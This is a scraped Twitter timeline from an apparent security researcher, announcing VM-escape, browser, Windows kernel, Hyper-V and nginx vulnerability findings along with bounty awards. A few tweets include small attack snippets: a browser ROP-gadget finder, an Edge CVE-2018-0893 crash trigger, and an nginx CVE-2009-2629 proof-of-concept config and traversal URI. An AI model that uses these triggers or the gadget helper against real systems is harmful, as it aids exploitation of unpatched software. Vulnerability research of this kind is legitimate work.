Got my 1st VM escape vulns in @Oracle VirtualBox, via unprivileged guest to hypervisor on the host. A little late for #pwn2own... Still a personal record: one month from zero (knowledge about the target) to zero (day). VirtualBox is nice and well-designed, I enjoyed looking at itpic.twitter.com/DldVJAs6CA
Dynamic ROP chain builder for browsers Uint8Array.prototype.rop = function(t) { function d(r,o,p) { if (r!=t[0]) return 0; for (q=0;q<t.length;q++) { if (undefined==t[q]) continue; if (p[o+q]!=t[q]) return 0; } return 1; } return this.findIndex(d); }
New challenge solved: HackSys Extreme Vulnerable Driver Uninitialized Heap Variable Challenge :) @HackSysTeampic.twitter.com/8cPCyO4O3L
E̶x̶p̶l̶o̶i̶t̶i̶n̶g̶ Self-patching Microsoft XML with misalignments and factorials http://www.phrack.org/papers/self-patching-msxml.html …
Proof of exploitable for the recent IE11/Edge googl0day vulnerability, which lay unpatched in general public for 2 weeks:pic.twitter.com/JaLQgmnTZD
Extremely bored in my lonesome hideaway. Here is a matrix of IE11 memory bytes disclosed via the image pixels 0daypic.twitter.com/DHeGAiVZ4F
Sometimes a DEP violation is just a DEP violation... Even though the full stack is bananas. #0dayfailadaypic.twitter.com/oPY0LziwON
Kernel's own win32k.sys ! xxxRealDrawMenuItem() patched in April MS16-039 - I think this is actually cve-2016-0143:pic.twitter.com/a9NMyfi7bJ
The Windows Shell CVE-2015-2515 (MS15-109) is definitely an Use after free. /cc @80vul @opexxx @Laughing_Mantispic.twitter.com/2QtgmweEEn
observe the call stack 0_o (cve-2015-2515)pic.twitter.com/PzSLQbR6AR
[3/3] This exploit has nearly torn my brains apart. I wish I sticked to the malware analysis lounge. #bugariumpic.twitter.com/Gtq2gFl4OZ
w00t #cve-2013-0007 #bugariumpic.twitter.com/aZtzLEIAAR
The strange case of #cve-2013-0007…pic.twitter.com/AmrS7MT3VL
Having fun with an old but fun #cve-2013-0007 (msxml rce) :pic.twitter.com/j9IYDW2G14
Я просто зашла в и-банк подписать платежки по зарплатам. Переполнение стека в BSS Internet Client #bugariumpic.twitter.com/2nQYUsSlvb
Double-dip exploitable: two distinct heap uafs / two softwares / one trigger #bugariumpic.twitter.com/1Cg8PLNbtO
One thing I miss from my fuzzers is black coffee added to their morning delivery: still a human is required for thispic.twitter.com/rbVDkSISgs
Once in a lifetime you see this for the first time… STATUS_BUFFER_OVERRUN #bugariumpic.twitter.com/YpEW6VIGpj
Another beautiful bug. Run, baby:pic.twitter.com/9APq0HCQQv
Poor thing windbg, it just didn't expect a windows programmer to reset the locals stack pointer in the ebp register:pic.twitter.com/yi6hhcsw0p
You know it's time to take a break from bughunting when useful software starts to fail at your glance to ASCII EIPs:pic.twitter.com/V6JyQYsqAl
A bug hunter's Lucky Clover, in the wild:pic.twitter.com/O8zclLh2cx
Did you know that SoftIce still works on XP SP3? I am such a snob. #debuggingpic.twitter.com/jbFtZtO
Note: it’s not even a fraction of my actual work - eg. does not include malware analysis from prev years, full stack DFIR, pentest, entrepreneurship, nonprofit, community management, and building a hackerspace from scratch. I have no idea where I am going with all that knowledge
I could compose a dozen of sad puns on the role of type confusions in my life. Let’s just say that browser was wrong... again window.__lookupGetter__('event').call(0x42424242 >> 1); // crashes more nicely on x86 Microsoft Edge CVE-2018-0893 (March 2018)
Found a little vuln in Chrome recently. Nothing super fancy, just an uninitialized variable in ANGLE via unchecked API call to Microsoft DirectX, which can (in theory) be leveraged into a memory disclosure in the GPU process. The bug was just derestricted: https://bugs.chromium.org/p/chromium/issues/detail?id=825503 …
Guys from the Zero Day Initiative wrote a blog post about the simpler kind of bugs in Oracle VirtualBox, including those discovered by myself (hey, thanks for sparing me a write-up! 
). Most importantly, they dropped a working PoC.
Go ahead, it’s easy -> https://www.zerodayinitiative.com/blog/2018/8/28/virtualbox-3d-acceleration-an-accelerated-attack-surface …
Was awarded my 1st ‘top tier’ security bounty from Microsoft recently (15$k for a single vuln) via Edge WIP bounty program. Not a big deal, ofc - just a conveniently objectivized milestone for independent white hacker’s career. Try it -> https://technet.microsoft.com/en-us/dn972323.aspx …pic.twitter.com/ksQGIS3nWW
Got teaser pics, too :Ppic.twitter.com/d4bqmBj2vP
To be fair, Firefox team refactored the old uconv code out of the mainline branch (non ESR). Now instead of 100 SLOC of old and buggy Unicode code they have 10000000000 SLOC of old, buggy, and also third-party ICU nightmarehttps://twitter.com/alisaesage/status/1142071531318599680 …
My theoretical analysis of one of the vulns that I found in Firefox last year CVE-2018-5144: Overflow in nsUnicodeToBIG5::GetMaxLength can create memory-safety bugs in callers https://bugzilla.mozilla.org/show_bug.cgi?id=1440926 …
Screen from my experiments with nginx CVE-2018-16845pic.twitter.com/hVa1p3lEAx
Accidentally crashed aarch64-gdb while trying to take a pretty picture of a breakpoint hit in Android kernel source codepic.twitter.com/iWm8Qpk39g
Have set up Android kernel debugging with gdb and kernel patches. UART-less, no special cables requiredpic.twitter.com/gz9NtTh4Qk
Nginx CVE-2009-2629 proof of concept testcase nginx.conf: http { ... merge_slashes off ... } HTTP request URI: //%2e%2e/
Adding a picture of Hyper-V debug log (via LIS) with a bit of extra logging added by myself, to prove as much as possible that it’s not some random BSODpic.twitter.com/khM66UEgqH
Guys are asking me to move on and find more bugs. OK This is a zero-day vuln in Microsoft Hyper-V. Tier 1 memory corruption in Root Partition ring0. DoS only :Ppic.twitter.com/bhTT4bguzU
Heads Up! Most recent versions of #NGINX — one of the most popular web servers that powers huge portion of the Internet today — contains an unpatched remote code execution (RCE) vulnerability.
Keep an eye out for the advisory and critical patch update in next 1-2 months.https://twitter.com/alisaesage/status/1134400428899127296 …
Oracle is now explicitly promoting VirtualBox 3D acceleration: https://blogs.oracle.com/scoter/oracle-vm-virtualbox-6-3d-acceleration-for-ubuntu-1804-guest … << that, after multuple security researchers independently confirmed that it’s extremely insecure, and I alone have found and reported a few dozens of VM escape bugs in this component last year
Btw, I checked out modern RDP internals a few weeks ago. Microsoft is currently working hard on refactoring the entire Terminal Services infrastructurehttps://twitter.com/alisaesage/status/1094235745429012480 …
Now that Ms RDP aka Terminal Services is finally getting hot as an offensive research target (it’s scheduled for pwn2own for the 1st time, + recently published paper on client-side bugs), here is a little research on TS reversing that I presented in 2011: https://www.slideshare.net/mobile/alisaesage/hacking-microsoft-remote-desktop-services-for-fun-and-profit …
I have reverse-engineered Qualcomm’s Linux kernel interfaces and the DIAG protocol to enable verbose logging of things such as physics variables from the radio interface, RTOS complaints, and OTA signals with PLMN from the baseband; a big deal for this crazy blackboxpic.twitter.com/J0AspSZWU7
A bit of my work from the past weeks: Qualcomm baseband debug-level diagnostic logging on production mobilespic.twitter.com/7l0Es0DmrN
Received my first Award of 2019: ZDI Silver. Who else, girls? (:pic.twitter.com/cT964iJVWt
Achievement unlocked: compiled a large piece of open source software that I use in my nightly work 
pic.twitter.com/M3UJUKXAwe
Accidentally stumbled upon an (almost°) perfect storage box for my offline calc-popping scraps 
—
° it can’t hexpic.twitter.com/ierx62oJ3Z
Did they forget a DCOM/RPC endpoint?
I have reverse-engineered @VMWare's patch for the vuln in VMWare ESXi that was exploited at @GeekPwn 2018 to take it down for the first time. It's an uninitialized stack variable usage RCE in the host-side code of vmxnet3 network adapter. Binary diff via Workstation 15.0.0/15.0.1pic.twitter.com/3JgMojFlbu
Getting back to one of the less boring projects of mine. Can you recognize the ISA without referring elsewhere?pic.twitter.com/kCZ520v3Ck
Još aktualnih događaja
Ovjeren akaunt
prije 2 sata h
Ovjeren akaunt
prije 3 sata h